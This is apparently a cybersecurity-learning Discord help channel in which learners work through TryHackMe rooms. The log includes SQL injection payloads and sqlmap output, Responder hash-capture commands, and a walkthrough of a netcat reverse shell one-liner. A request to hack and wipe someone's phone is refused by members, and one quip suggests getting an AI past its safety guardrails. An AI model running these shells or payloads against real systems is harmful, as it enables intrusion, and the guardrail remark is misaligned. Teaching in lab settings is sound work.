   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.145.206  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   3   Windows Server 2008 R2

storm drift
storm drift
analog heath
storm drift
#

attackbox machine should be the LHOST. The target machine is RHOSTS. lol

slim bison
analog heath
storm drift
#

yes so I'm not scanning my own IP 😉

analog heath
storm drift
#

Yes that is what I'm doing now. I have terminated the old target and spinning up the new one. 🤞

#

thanks

#

looks like terminating target machine and starting a new worked

rotund hollyBOT
#

Gave +1 Rep to @peak veldt (current: #3698 - 1)

rotund hollyBOT
#

Gave +1 Rep to @vagrant fern (current: #12 - 921)

covert bloom
analog heath
covert bloom
#

I am done with that actually

#

Just finding how to get me responder to listen and get me the netNTLMv2 hashes

analog heath
analog heath
#

like sudo responder -i tun0 -dwv

covert bloom
analog heath
covert bloom
#

Hey it worked, was using different interface ip , I am dumb sry

#

What exactly is dw and v

#

V is verbose ig

analog heath
analog heath
analog heath
#

i recommend everytime use -v it's developers trait.

#

for every command.

covert bloom
analog heath
covert bloom
#

Well u am totally new to these concepts, so I didn't kn

#

But would it work if i use VPN in base machine to connect with thm and then use eth0 from Kali??

analog heath
#

because interface tun0 allows to connect your machine with THM networks by giving you a specific THM ip.

#

so tun0 is the only thing, your actual machine can communicate with your THM target machine.

covert bloom
#

Ah okay , but then how does she connection works?

round jetty
rancid lynx
calm sierra
#

Hey guys, not sure if this is the place to ask for help but I'll fire away anyway.

I'm hosting a KotH on TryHackMe and the openvpn file downloaded doesn't work when doing "sudo openvpn KotH.ovpn".

I've tried updating/upgrading my Kali machine and regenerating the VPN file after switching regions.

It doesn't create the tun0 interface and hangs at VERIFY OK. Some of those connected could use the VPN while others like myself couldn't.

Any ideas?

calm sierra
#

Regions I tried are Frankfurt and Ireland.

round jetty
calm sierra
calm sierra
round jetty
calm sierra
round jetty
calm sierra
#

Oh, hotspot. But I can openvpn to your regular machines fine.

#

And another KotH player is on home network and they can't connect

PS: the machine has ran out on time, I'm making a new session so I can see what the problem is for next time I host it.

main coral
calm sierra
#

Yeah I can't host a session by myself to check or anything and the other players have left. I'll hop in here if I have the same issue again in the future, cheers.

Edit: This was attempted across two sessions, so changing sessions did not work.

There were also differences in the config files that did work and those that didn't. For example, the recv/send buf was 0 on the files that didn't work but 52240 (iirc) on those that did, different servers in very different options ranges, etc.

main coral
calm forum
#

Thanks for this. I know where I was going wrong now, I was typing https instead of http! 😫

rotund hollyBOT
#

Gave +1 Rep to @grave rover (current: #3698 - 1)

chilly lichen
#

Hey everyone 👋
I’m currently learning cybersecurity (just started building my portfolio) and working through labs on TryHackMe.

I’ve completed a basic internal security audit project using the NIST Cybersecurity Framework, and I’m trying to structure my portfolio in a way that aligns with industry expectations.

I wanted to ask:

  • What kind of projects do employers actually look for in entry-level cybersecurity portfolios?
  • Is it better to focus more on hands-on labs (like TryHackMe) or structured reports (like audits and risk assessments)?
  • Are platforms like GitHub or Notion preferred when presenting a portfolio?

Any advice or examples would really help 🙏

willow moat
#

I really want to learn coding and tech but I need help pls

analog heath
strange saffron
deft condor
#

Hey I was doing the CyberHeroes room. The room says that the answer is a way to bypass the authentication. I did a XXS and SQL injection on it. It didn’t work. Any other tipps to bypass the authentication?

median wing
#

Hi

wise viper
#

Just in case anyone else finds this; you can run history in each tmux session to find a command with the root password.

robust mural
#

wreath 10.200.180.150 not working at all, I tried reset, new vpn etc. before I couldn't acces any of the named ports

#

100 also

golden kelp
#

Hello everyone. Can anyone help me fix the issue I am facing? I have contacted customer support and waiting for a response but if I can fix it asap, it would be awesome. I'm in a room linux fundamentals part 1 and when I run virtual machine using start machine button, I end up getting different directories than it shows in tutorials. I am pretty sure that folder1 folder2 folder3 are the directories I created while following different tutorials but now Idk why it shows here. I have tried like 10 times to terminate machine and restart it, ssh into ip address it shows in target machine information tab but nothing helps. Can anyone guide me where I can get help from?

analog heath
analog socket
#

Why get a career in cyber:

High demand: over 3.5 million unfilled roles.
Strong salaries: competitive pay even at entry level.
Constant learning: the field evolves fast.
Are you ready to learn more about some of the leading roles involved in cyber security? Let's begin!

Answer the questions below
How many unfilled cyber positions are there?

Pls can someone help me solve this,i choose over 3.5million and its still wrong.

crystal dragon
#

Bonsoir

main coral
main coral
crystal dragon
#

Deleted Message

#

Deleted Message

#

Deleted Message

#

Deleted Message

main coral
#

hop to dms

flat peak
#

hello guys

fast elm
#

As per the "Windows Fundamentals" topic rewind recap, what do starting TryHackMe machines have to do with setting up a real-world installation of Windows in an AD environment?

half sierra
#

hello guys, did anyone of you finish the room called el bandito?

#

that shit is hard

#

hello>??

slim bison
robust mural
#

Windows Local Persistence how has a normal user the rights to change some administrative groups like adding to a new group? or using secedit? In my experience thats the reason for bloodhound and lateral movement, but the room acts like thats total normal?

calm escarp
#

sorry guys for coming like that but, for the soc simulators, is there a way to copy something from the alert queue and paste in the analyst's VM ?

robust mural
#

Example in the room:
GET /socket HTTP/1.1
Host: 10.114.163.202:8001
Sec-WebSocket-Version: 777
Upgrade: WebSocket
Connection: Upgrade
Sec-WebSocket-Key: nf6dB8Pb/BLinZ7UexUXHg==

GET /flag HTTP/1.1
Host: 10.114.163.202:8001
but the right server is:
GET /socket HTTP/1.1
Host: 10.10.233.72:8001
Sec-WebSocket-Version: 777
Upgrade: WebSocket
Connection: Upgrade
Sec-WebSocket-Key: nf6dB8Pb/BLinZ7UexUXHg==

GET /flag HTTP/1.1
Host: 10.10.233.72:8001
How is that possible???

#

room: Request Smuggling: WebSockets

#

the proxy is supposed to devliver the request to the webserver? but there are two proxies? wtf?

robust mural
#

lol...there are a lot of different server, and the named never works

crisp smelt
#

morning hackers

sacred venture
waxen burrow
#

Anyone any recommendations for pentesting I am just a beginner what should I start with?

uneven pumice
#

Hi, I’m a beginner in cybersecurity. How should I start?

fast temple
#

Hey, hello everyone.
I'm having trouble accessing the attack server.
https://tryhackme.com/room/uploadvulns

This is the room. I configured the hosts file exactly as instructed, but I still can't access it.
I checked the traffic in Burp, and the target hostname is included in the Host header, so I'm not sure what the problem is.

If anyone has a moment, I'd appreciate some help.

covert bloom
#

Hey can anyone explain what are NOPs and what do they mean by consistent payload sizes?

covert bloom
lunar skiff
#

Room: Windows Basics
Issue: VM freezes after launch / becomes unresponsive
Tried: multiple restarts, different sessions.
Other rooms (Windows CLI) work fine. (Hope some one could fix this area, thank you)

covert bloom
plush saddle
#

hey is there anyone who can help me out in erasing all the data from someone else's phone?
it's really urgent

analog heath
analog heath
plush saddle
#

that's why

round jetty
plush saddle
#

by the video of mine

#

can anyone help me sending any kind of malware or something?

round jetty
#

How do you know they have it?

plush saddle
#

she's my aunt

round jetty
#

Lmao.

#

Call the cops.

plush saddle
#

that's not possible...my mother knows about it but my father doesn't

#

i can't just call the cops

round jetty
#

Yes you can.

#

Black mail is illegal.

#

And if a mother is letting this happen, tell your dad.

plush saddle
#

yeah i know....but i don't want my father to know about it

#

my mom is supporting me....

round jetty
#

So why isn't your mum doing shit?

plush saddle
#

because my mother does'nt know hacking

#

doesn't*

#

can anyone help me....

#

i can't just explain the whole situation...it's complicated

flat peak
round jetty
plush saddle
#

its really urgent

round jetty
#

Nobody is going to hack a phone for you.

plush saddle
#

my aunt

round jetty
#

Remove the blackmail

plush saddle
round jetty
analog heath
# plush saddle its really urgent

if you tried to hack phone, then you will be the accused. so instead of exploiting others, try to defend yourself, yeah raise a complaint.

round jetty
plush saddle
#

yes

round jetty
#

Then the chances of the back up being uploaded to a G drive is high

grizzled shale
#

@plush saddle can you please re explain the problem, with a little more detail than "im being blackmailed"

round jetty
#

It's no point.

Nothing we can do

grizzled shale
#

In a case like this the obvious answer is call the cops. Blackmail is illegal and so is unauthorized access to systems you dont own.

#

If you need to wipe data and you OWN the phone being wiped, turn off autobackups, go delete your backups on google, delete everything in your drive, delete everything off the phone, and if you really need to wipe it just brick it and get a new phone.

#

Im not gonna sit down and write you a tutorial on the obvious though. Ask ai how, if you can get past the safety guardrails. If not, accept your fate or call the cops.

round jetty
grizzled shale
#

Oh LMFAO

#

How tf Lil bro even end up in this situation XD

round jetty
#

Who knows.

Questionable on what video the aunt has.

grizzled shale
#

Thats what im saying I need the lore drop

round jetty
#

I don't think we need know what the video is, and why the aunt as such a video.

grizzled shale
#

Idk bro Im invested now 🍿

#

Jk jk

smoky dew
#

Hello, in room networking core protocols, in POP3 task, i can't retrieve the flag. Can someone help me please? im usin openssl s_client -crlf -connect 10.114.172.168:995 and it gives output +OK Dovecot (Ubuntu) ready. USER linda +OK PASS Pa$$123 +OK Logged in. RETR 4 RENEGOTIATING ERROR 40C74ED6597F0000:error:0A00010A:SSL routines:can_renegotiate:wrong ssl version:../ssl/ssl_lib.c:2892:

subtle pagoda
grizzled shale
covert bloom
#

Hey everyone, can anyone help me with notes of cyber security 101 rooms , I am not very good at making notes , so was just hoping if there is any resource that could help

grizzled shale
#

You have to practice. Look up good note taking habits and try to put them into practice. Document workflows and make yourself commandline cheat sheets. You will get it bro ❤️

#

It was daunting for literally every one when they started. @covert bloom just keep working at it

rotund hollyBOT
#

Gave +1 Rep to @analog heath (current: #891 - 8)

smoky dew
#

Hello, in room networking core protocols, in POP3 task, i can't retrieve the flag. Can someone help me please? im usin openssl s_client -crlf -connect 10.114.172.168:995 and it gives output +OK Dovecot (Ubuntu) ready. USER linda +OK PASS Pa$$123 +OK Logged in. RETR 4 RENEGOTIATING ERROR 40C74ED6597F0000:error:0A00010A:SSL routines:can_renegotiate:wrong ssl version:../ssl/ssl_lib.c:2892: can anyone help please?

analog heath
#

and on port 110

#

openssl s_client -connect 10.49.155.136:110 -starttls pop3 -quiet @smoky dew

smoky dew
#

Thank You! I'll try it tommorow 😊

left anvil
#

Did they change it so that when you answer a question correctly, it grays out the answer you can't see what you put?

wraith kettle
#

@full token me puedes ayudar con una problema de filtro en wireshark?

versed grotto
#

hi

wraith kettle
#

hi

ornate gazelle
#

Pls I need friend am from Nigeria

outer tiger
#

What is the difference between a bash and a shell

gleaming oxide
outer tiger
#

@gleaming oxide thanks bro

rotund hollyBOT
#

Gave +1 Rep to @gleaming oxide (current: #149 - 74)

slim bison
shut wave
urban elk
strange bramble
#

Hello, I'm having a problem with the room, specifically regarding how websites work. I need to inject HTML code to display a given site on the page of the vulnerable website. I tried entering the credentials I found in the source code, and right after that, I tried using the <a> tag etc., but it's not working.

strange bramble
#

I can't send a screenshot, it's one of the first rooms for beginners, so I think it should be relatively simple, but I'm stuck.

#

the room "how website work" injection html

vagrant fern
dull apexBOT
strange bramble
#

ok ! thanks

vagrant fern
#

yep?

flat peak
#

I need a Hel

#

P

vagrant fern
#

Describe what type of help you need and folks who are familiar would jump in.

flat peak
vagrant fern
flat peak
#

I will explain wait

#

If iam sending a email to u any in the middle is changing the content of it and then u will get a changed email

flat peak
analog heath
#

where you may change content of traffic

#

if it's poorly encrypted.

flat peak
#

Thx

hot sedge
#

Hey guys. Im very new to backends and commands and stuff. Any that can help me with not just MDM but DEP on a MacBook Pro with M4? I know there’s a script for it, but I don’t think it completely takes it off the Apple servers. if that is possible you need help.

torpid prawn
#

i'm stuck on snapped phish-ing line, can't find the answer from question 5. I tried to use virustotal in order to get the sha256 of the file. But I just have the url, with http://..... So I can't get a sha256 from an url. I need to get it from the real file.I thought it was the same thing as the url without the "http://" but it seems that's not like that. If someone can help me to find out !

acoustic ore
#

Hey all, I'm stuck on Linux Fundamentals Part 3: Task 8 - Maintaining Your System: Logs
I've navigated into the apache2 logs location in a terminal, and I'm stuck on the question "What is the IP address of the user who visited the site?

root@ip-10-128-69-204:/var/log/apache2# cat access.log
root@ip-10-128-69-204:/var/log/apache2# cat access.log.1
127.0.0.1 - - [06/May/2024:23:54:15 +0100] "GET / HTTP/1.1" 200 3477 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
127.0.0.1 - - [06/May/2024:23:54:15 +0100] "GET /icons/ubuntu-logo.png HTTP/1.1" 200 3623 "http://127.0.0.1:81/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
127.0.0.1 - - [06/May/2024:23:54:15 +0100] "GET /favicon.ico HTTP/1.1" 404 487 "http://127.0.0.1:81/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"

#

The access logs only have the local ip in them

#

Have I missed something? 🙂

round jetty
acoustic ore
#

Oh I was mirroring from the video

#

Ahhh got it, it was because I wasn't SSHed in. Forgot I disconnected lol

barren notch
#

Hi guys can someone help me learn game hacking for android like unlimited money

#

Hello pls anyone

smoky dew
rotund hollyBOT
#

Gave +1 Rep to @analog heath (current: #818 - 9)

hallow relic
main coral
uneven pumice
rotund hollyBOT
#

Gave +1 Rep to @covert bloom (current: #3702 - 1)

covert bloom
muted peak
#

`XXE.Injection.v.1.4-badr

` this room server is unreachable from my machine connected through VPN.

ashen crane
#
TryHackMe

This path teaches you how technology works from the ground up, no prior experience needed. From computer basics and your first lines of code to networking, the web, and cyber attacks and defences, this is where your cyber security journey begins.

fading wigeon
#

Hey guys I am on doing crack the hash level 2 and wordlistctl doesnt seem to be installed on the attackbox

analog heath
#

if this is an attackbox, your rockyou.txt will be on this path /usr/share/wordlists/rockyou.txt

fading wigeon
#

fml I am so dumb

#

hmmm its looking for another directory in the path

analog heath
fading wigeon
# analog heath it worked?

it showed the path and when I do ls it shows it but the answer is looking for another directory within the path

#

/usr/share/wordlists/something/rockyou.txt

analog heath
#

yeah it only shows path. so copy that path and change dir to that.

#

or instead.

#

be on the current directory, just map out your wordlists full-path like -w /usr/share/wordlists/rockyou.txt

analog heath
#

@fading wigeon still confused? show me output of worlists i will give you command.

fading wigeon
#

yeah a little confused

round jetty
#

ls

fading wigeon
analog heath
fading wigeon
#

yep

#

but the answer is looking for 5 branches in the path whereas that is only 4

#

including rockyou.txt

analog heath
fading wigeon
#

task 3

#

task 3 assumes I can use wordlistctl when I cant

#

nvm nvm

#

I am an idiot

#

although the last question task 3 seems to need wordlistctl

analog heath
fading wigeon
#

was I supposed to install it myself?

analog heath
round jetty
#

The answer won't be obtained due a change in the Attackbox.

#

Rockyou used to be in a directory called passwords.

analog heath
#

so you are on attackbox, and here its apt repo handler. so try if it works, because i had an arch with blackarch repo, so its easy to install sudo pacman -S wordlistctl for me.

#

or you need to install it manually on your machine.

#

@fading wigeon try sudo apt install wordlistctl

fading wigeon
#

will do I am just gonna restart the attackbox just in case

analog heath
#

as there is no wordlistctl installed, so you need to install it first.

#

let me check how you can install it in debain based distro.

#

@fading wigeon

fading wigeon
#

unable to install it

analog heath
fading wigeon
#

that did it

analog heath
#

chmod +x wordlistctl.py
sudo cp wordlistctl.py /usr/local/bin/wordlistctl

#

sudo cp repo.json /usr/local/bin/repo.json

#

and check it if it's working wordlistctl list

fading wigeon
#

looks like it

analog heath
#

did you ran all command i just sent?

fading wigeon
#

yep

analog heath
fading wigeon
#

that was the screenshot I sent

analog heath
fading wigeon
#

that did it thank you

hallow relic
gleaming oxide
hallow relic
rotund hollyBOT
#

Gave +1 Rep to @gleaming oxide (current: #146 - 75)

covert sand
#

Hello everyone!

whole steppe
slim bison
whole steppe
#

But .. I tryied to see online if someone can open the hidden website and i found someone who can open it on youtube ..

#

like, the subdomain can not be resolved on my computer

#

main website sure, it cannot be open and we don't need to

#

but the subdomain too ?

slim bison
# whole steppe like, the subdomain can not be resolved on my computer

to be clear, the site is not live and not needed to solve any of the lab, a clue on the way to the goal is all - happy hacking;) EDIT: looking into this closer, this part of the lab (live subdomain) is currently broken. However, there are other ways to get to the same goal in the end;)

sudden mauve
#

is anyone available to help me unstand why this flag won't input properly | I'm in the SOC L1 Alert Triage room task 5 question 1. I got the flag after completing the triage however it's putting the underscore one space before it should go and throwing off the whole flag?

#

I got it, I didn't realize that we were getting a flag for every alert, I thought is was all one flag

hushed timber
#

Hello!

modest wren
#

Hello!

covert bloom
#

hey everyone , i just trying to exploit the Metasploit vm in the following room
https://tryhackme.com/room/metasploitexploitation
i tried ftp_login didn't work and got access through smb but no confidential files and also tried http port but just a waste website
can anyone help?

TryHackMe

Using Metasploit for scanning, vulnerability assessment and exploitation.

glad sluice
#

Hey chat

potent latch
scenic spruce
#

i need help

analog heath
scenic spruce
scenic spruce
still gate
#

Maybe this is social engineering practice :))?

analog heath
#

@scenic spruce FR if money had stolen physically then what could a discord stranger can do for u?

still gate
scenic spruce
# analog heath tell the cops

in pakistan no one is listin if you need launch fir you need lots of money to give them after that he can launch fir

analog heath
analog heath
#

if it was Hacked, then maybe.

scenic spruce
analog heath
scenic spruce
analog heath
scenic spruce
lunar skiff
#

"Widows Basics" i am doing and the VM is giving me trouble to finish it.. I am Task 3 "Configuring & Securing Windows" but i cant complete room thanks to that VM... Other task i was able to do by terminating like 100 times and getting info slowly to other tasks.. But i cant finish the room..

lunar skiff
#

Hhh frusraiting

#

Task 3

#

I tried openVPN but that didnt help either

analog heath
analog heath
lunar skiff
#

Now

analog heath
lunar skiff
#

It works for some time then it freezes totally (Cant click on anything) after few clicks and it is stuck

analog heath
lunar skiff
#

All other VM:s so far has worked

#

Will they repair the problem if i aint the only one? Just saying

analog heath
lunar skiff
#

hmm

#

The Windows CLI works fine for me

analog heath
#

complete this room in split mode only, it will work.

lunar skiff
#

But not the basics VM

#

How do you mean?

analog heath
#

like these.

lunar skiff
#

Yeah thats how i tried and have tried

analog heath
#

and if you wanna try manually by you, then you can restart it, and if it gets stuck - wait for a moment.

lunar skiff
#

No doubt and thats pretty easy task i just wanted to get it out of the way in progress path i am now on the last section "Attacks & Defenses"

#

Yeah xD i waited 30mins while i cooked some dinner lol and no change

analog heath
#

and avoid many tabs on your browser, close all, it will improve its network.

#

did you tried changing your region from your THM settings?

#

it works most of the time.

lunar skiff
#

I am sure i havent but i take alook

#

Nice i changed location and it worked as far as it could then froze again and i closed all my websites (Had 2 other) well among THM ;D

analog heath
lunar skiff
#

Ok, but thanks for guidance anyways

limpid hound
#

Hey everyone, I'm running into a persistence bug on the Azure: Tapper room.

When trying to log into the Azure Portal as gumby, I'm locked out by an Authenticator prompt. It looks like a previous student didn't remove their MFA before leaving the shared tenant.

I've already tried terminating the machine and fully redeploying the lab a few times, but the Entra ID tenant doesn't seem to reset between deployments, so the MFA is still stuck there. Could someone from the team please clear the MFA settings for the gumby user so the room can be completed? Thanks!

lunar skiff
#

I tested the "Windows Basics" room again, but on my other computer what has Windows OS, it worked better but still froze. The issue is partly client-side & partly server-side i would believe.

rose geyser
#

Hi everybody,
Upload Vulnerabilities, Task 9, I modified the magic number of my shell PHP file and successfully bypassed the server-side filtering to upload the file, enumerated directories to find /graphics, but when I visit http://magic.uploadvulns.thm/graphics/shell3.php I get a "500 Internal Server Error".
Thanks in advance for your help.

rose geyser
#

Nevermind, for some reason, when I modified the first bytes with hexeditor, it deleted the end of the PHP file.
Problem solved.

still gate
#

this is the command I run and result

sqlmap -r test.txt -p username --level 5
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.10#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:56:33 /2026-03-30/

[17:56:33] [INFO] parsing HTTP request from 'test.txt'
[17:56:33] [INFO] testing connection to the target URL
[17:56:34] [INFO] testing if the target URL content is stable
[17:56:34] [INFO] target URL content is stable
[17:56:34] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[17:56:34] [INFO] testing for SQL injection on POST parameter 'username'
[17:59:10] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[17:59:11] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2806 HTTP(s) requests:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind
    Payload: username=test' RLIKE SLEEP(5)-- KPYW&password=test&function=login
---
[18:01:17] [INFO] the back-end DBMS is MySQL
[18:01:17] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12```
#

and I idk how to use sqlmap to conitinue get admin username

#

before that I was use this payload to bypass 1%27%20||%201=1%20--+ but turn out it just gave me dev account

analog heath
#

run sqlmap -r test.txt --dbs

#

whatever db you found, list it's tables and their content too. by sqlmap -r test.txt --dbs <any db name> --tables

potent latch
still gate
analog heath
still gate
analog heath
#

so check for current db

still gate
analog heath
#

sqlmap -r test.txt --current-db try to run it, it may give you the current db, if listing all db is getting errors.

kindred cove
#

The Machine at "Windadbasics" - adbasics_v1.2--badr Is freezing. And can't continue the exercise.

still gate
#

are there anychance that maybe it use assume wrong type of sql?

#

I mean while I scan it, I skip when it dectect a databases types

analog heath
#

wait, i think sqlmap is not trying at all, it just pasting this within a seconds.

#

is your sql payload is working?

still gate
analog heath
#

okay if it is working in burp then it's sqlmap issue, try with fresh session sqlmap -r test.txt --flush-session --fresh-queries --current-db --time-sec=10

analog heath
analog heath
still gate
#

is it a false positives?

still gate
#

cannot dump dbs

kindred cove
#

Where do i get the IP Of the machine? I have to start it?
You can use the SSH client on the AttackBox to connect to MACHINE_IP with the following credentials:

Username: user
Password: Tryhackme123!

stark dust
inner dove
#

Hi I'm stuck into the Linux Fundamentals Part 3, I've tried to check the access.log as the question demand but into the attackbox there is nothing and into the target i can only access it by using sudo because i've got the permission denied

#

Nevermind, i've tried every possibilities before checking permission with ls -l sorry

fair meadow
#

hello i doing firewall fundamentals rooms

#

i cant acces the webpage in the task

#

i see there was rule already in the v m

fathom crypt
#

Hello Guys thank you!

rotund hollyBOT
#

Gave +1 Rep to @wheat merlin (current: #3703 - 1)

heady anchor
#

hello everyone

hard bramble
#

I need help with getting through Active Directory Basics (https://tryhackme.com/room/winadbasics). I don't understand how to use RDP or RDC in Task 4. It seemed like RDP was an option in previous rooms like the Windows Fundamentals ones, but now that's no longer the case.

TryHackMe

TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!

next turtle
#

what part of task 4 specifically are you stuck on? @hard bramble

hard bramble
#

Using Remote Desktop Protocol or Remote Desktop Connection. This can't be completed without understanding how to properly use that.

hollow hare
#

@rustic hare Is it possible to increase the VM resources for the Unattended room? Registry Explorer is taking more than 30 minutes just to open then hangs for another 5 or 10 mins before being usable.

valid comet
#

hello guys first I don't know why i can't send a image here i hope i could
next i couldn't answer this question in tryhackme Room Name ""windows fundamentals"" any help ?
""What is the name of the hidden folder that is shared?""

heady roost
#

hi

molten cloak
#

Hello, can anybody help me? Shells Overview room, section "practical task". The task is: Using a reverse or bind shell, exploit the command injection vulnerability to get a shell. What is the content of the flag saved in the / directory? I injected the payload and nothing happened. There is no output. I have no idea what to do with this.

humble tulip
#

Attackbox issue anyone? I cannot use the attackbox at this moment, been trying to access it for 30 minutes now

still gate
# molten cloak

that command should paste to target machine not in attack box

molten cloak
#

uuuh it does pase to target machine? It has its IP: 10.112.183.20

still gate
#

if its 10.112.183.20 just paste the rm -f ... to it

#

remember to change nc stuff to attack box ip and port

#

and run nc -lnvp PORT in attack box

molten cloak
round jetty
round jetty
molten cloak
#

Yes. Im using 10.112.96.2 to get to 10.112.183.20 on 8081. Is this incorrect?

round jetty
#

No, you'll need the target machine to call back to the attacker machine.

#

So you use your REMOTE ip.

obtuse oyster
#

hello
i was trying to do the overpass 1 room
i encountered a problem:
i am supposed to open port 80 on the attackbox to serve via http a script that will be executed on the target machine via cron (i can overwrite /etc/hosts to redirect the target machine to the attackbox ip), except I can't because the attackbox already use port 80
i tried killing the process (which was not a good idea and crashed the vm)
is there another way to do this ?

molten cloak
round jetty
molten cloak
round jetty
molten cloak
#

hmm ok

round jetty
#

Come on, you're 0x7.

molten cloak
round jetty
obtuse oyster
molten cloak
#

It's still no result. The effect is the same

round jetty
#

Are you using 4444?

molten cloak
round jetty
#

It needs to be one.

obtuse oyster
#

so you should have a shell on both machine
on the attackbox you run : nc -lnvp 4444 to listen to connections on port 4444

round jetty
#

It needs to be either 8081, or 4444.

#

Since you declared 8081 on the command for the rm, you need to use that one.

molten cloak
obtuse oyster
#

and on the target machine you run:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc ATTACKBOX_IP:4444 > /tmp/f

molten cloak
#

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 10.112.96.20:8081 >/tmp/f

round jetty
obtuse oyster
#

i didn't check the command i just copied from your message, let me check

molten cloak
obtuse oyster
#

the command should be
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.112.96.2 4444 >/tmp/f

if you're listening on port 4444
and with 8081 with you're listening on port 8081

molten cloak
obtuse oyster
#

can you show me your two shells ?

round jetty
obtuse oyster
#

you should type nc command on attackbox

#

and the other one on target machine

molten cloak
obtuse oyster
#

ok that is the problem

#

you need to type the command on the target machine shell

molten cloak
round jetty
#

sigh

obtuse oyster
#

normally on this room you should have two machines

#

by that i mean two buttons accessible

#

to connect to the attackbox and the target machine

molten cloak
molten cloak
obtuse oyster
#

like this:

molten cloak
next turtle
round jetty
#

It's you who's clearly having the bad day.

molten cloak
#

so far, there is just one access

molten cloak
next turtle
obtuse oyster
#

are you using your vpn connection or the attackbox ?

molten cloak
#

I just clicked on "attackbox" that is why it's "save room" here

molten cloak
obtuse oyster
#

ok so in Room introduction there is a green button normally

#

called "Start Machine"

molten cloak
next turtle
#

is the button grey?

molten cloak
#

yes

molten cloak
obtuse oyster
#

ok

next turtle
#

if I'm correct I believe that some machines don't show you an interface besides the attackbox

obtuse oyster
#

normally you should have an interface for this room

#

i just started it

molten cloak
#

shit

obtuse oyster
#

and i have one

next turtle
#

try refreshing the page or look for a button that says something like "show split view"

obtuse oyster
#

it means maybe your machine didn't start correctly
if refreshing doesn't work, maybe terminate it and start it again

rotund hollyBOT
#

Gave +1 Rep to @obtuse oyster (current: #3704 - 1)

molten cloak
#

I think now it's working.

obtuse oyster
#

ho okay

molten cloak
#

but it seems like it's the first time it works as it should

obtuse oyster
#

ok
sometimes bad luck is the problem
don't worry

yes you have the correct one started

molten cloak
#

Ok, I'll follow the hints you gave me before this interface issue

#

Many many thanks

rotund hollyBOT
#

Gave +1 Rep to @next turtle (current: #3704 - 1)

obtuse oyster
#

so you should have two shells:
one on your attackbox
one on your target machine
you type the nc -lnvp PORT command on the attackbox
and the longer one on the target (ShellOveriew-Demo-v1)

molten cloak
#

yes

#

clear

hard bramble
next turtle
# hard bramble Whichever is best. I've never tried it before, and now I have no choice.

I would recommend using the website machine since it usually has everything loaded on it and all the connections it needs. When you use RDC/RDP on the web machine (when it comes the time for the task), you put "localhost" as the computer name and continue from there. It'll give you a warning that it couldn't verify the computer, but you just ignore that since you're just connecting to the computer's server. Then once you get to the login page, you just put in the login information that the task gave you. (You shouldn't need to actually connect using RDC/RDP until Task 4)

molten cloak
#

The command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.112.151.171: 8081>/tmp/f

#

is something wrong with the syntax?

obtuse oyster
#

ok so show me the output of both your shells

molten cloak
#

yeah

#

ShellOverview:

#

attackbox

obtuse oyster
potent latch
obtuse oyster
potent latch
obtuse oyster
potent latch
molten cloak
obtuse oyster
molten cloak
#

nc: missing port number

#

wtf

obtuse oyster
#

show your command again ?

molten cloak
obtuse oyster
#

wait i made a mistake
its not IP:PORT its IP PORT

#

sorry about that

molten cloak
#

so no colon

obtuse oyster
#

so replace the ':' by a ' '

#

you should have nc 10.112.151.171 8081
instead of nc 10.112.151.171:8081

molten cloak
obtuse oyster
#

i used '' because it is used to specify a single character where "" is used for a string of characters

#

it wasn't meant to go in the command

molten cloak
obtuse oyster
#

show me your command again

molten cloak
obtuse oyster
#

i think there is a space after 8081

molten cloak
#

hmmm ok

#

no, there isn't

obtuse oyster
#

i wanted to say add a space after 8081

molten cloak
#

ooh

obtuse oyster
#

did it work ?

molten cloak
#

it just did nothing

obtuse oyster
#

ok go back to the attackbox shell

#

and type ls

molten cloak
#

ok

#

nothing

obtuse oyster
#

i'm going to try this on my machine

#

first you should have "Connection received on IP PORT"
which isn't the case

#

your attacker ip is not correct

molten cloak
#

ok

obtuse oyster
#

your attacker ip is 10.112.74.227 and you used something that ends with 151.171

molten cloak
#

oh right, I get it

obtuse oyster
#

yes that is the target machine
you are trying to connect from the target machine to the attacker machine
that is what a reverse shell is : you execute code on the target machine and it connects back to your own who is listening
in a bind shell the target is listening and your machine connects to it